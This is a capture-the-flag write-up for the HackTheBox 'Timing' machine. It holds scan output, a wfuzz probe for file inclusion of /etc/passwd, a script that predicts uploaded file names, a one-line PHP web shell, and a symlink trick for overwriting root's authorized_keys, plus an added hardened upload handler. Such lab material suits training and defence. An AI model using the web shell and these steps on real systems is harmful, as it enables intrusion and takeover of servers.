HackTheBox-Timing

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the webserver we can see a login page.

wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://10.129.245.78/image.php?FUZZ=/etc/passwd" --hw 0
<?php
include_once "auth_check.php";
// Only sessions whose role is 1 may view this panel; everyone else is redirected.
if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
    echo "No permission to access this panel!";
    header('Location: ./index.php');
    die();
}
?>

Foothold

<?php
// '$file_hash' is single-quoted, so PHP treats it as the literal string
// "$file_hash", not as a variable. Left as-is because this mirrors the
// server's own naming scheme; only time() varies between runs.
$file_name = md5('$file_hash' . time()) . '_' . 'shell.php.jpg';
echo $file_name."\n";
?>
<?php
// Minimal web shell: runs the value of the cmd query parameter.
system($_GET['cmd']);
?>
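The naming scheme above is predictable because the hashed input is a constant string plus the current second. The following hardened upload handler is an added example, not code from the box or from this writeup; it assumes a hypothetical form field named fileToUpload and an uploads directory kept outside the document root.

```php
<?php
// Added example: hardened upload naming (not the box's code).
// Assumptions (hypothetical): form field "fileToUpload", files stored in $upload_dir
// which is outside the web root and not served by Apache.
declare(strict_types=1);

const ALLOWED_EXT = ['jpg' => 'image/jpeg', 'png' => 'image/png'];

function safe_upload_name(string $original_name, string $detected_mime): string
{
    $ext = strtolower(pathinfo($original_name, PATHINFO_EXTENSION));
    // Allow-list the extension and require the sniffed MIME type to agree with it,
    // so a "shell.php.jpg" carrying PHP source is rejected instead of stored.
    if (!isset(ALLOWED_EXT[$ext]) || ALLOWED_EXT[$ext] !== $detected_mime) {
        throw new RuntimeException('Unsupported file type');
    }
    // 128 bits from the CSPRNG: the stored name cannot be derived from time()
    // or from any constant string, unlike md5('$file_hash' . time()).
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function handle_upload(array $file, string $upload_dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $name  = safe_upload_name($file['name'], $mime);
    $dest  = rtrim($upload_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // never executable, never world-readable
    return $name;
}

if (isset($_FILES['fileToUpload'])) {
    try {
        $stored = handle_upload($_FILES['fileToUpload'], '/var/www/uploads');
        echo 'Stored as ' . htmlspecialchars($stored) . "\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage()) . "\n";
    }
}
```

Serving the stored files through a separate handler that sets Content-Type from the allow-list, rather than exposing the directory to Apache, keeps an uploaded image from ever being interpreted by the PHP module.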

Privilege Escalation (aaron)

Going into the /opt folder we saw a backup of the site in an archive.

Privilege Escalation (root)

Running sudo -l shows that aaron can run netutils as the root user.

Method #2

Another way to get root is to make a symlink whose source is /root/.ssh/authorized_keys. You can name the symlink anything you want, but make sure the file you download is given the same name as the symlink.

ln -s /root/.ssh/authorized_keys/ abc
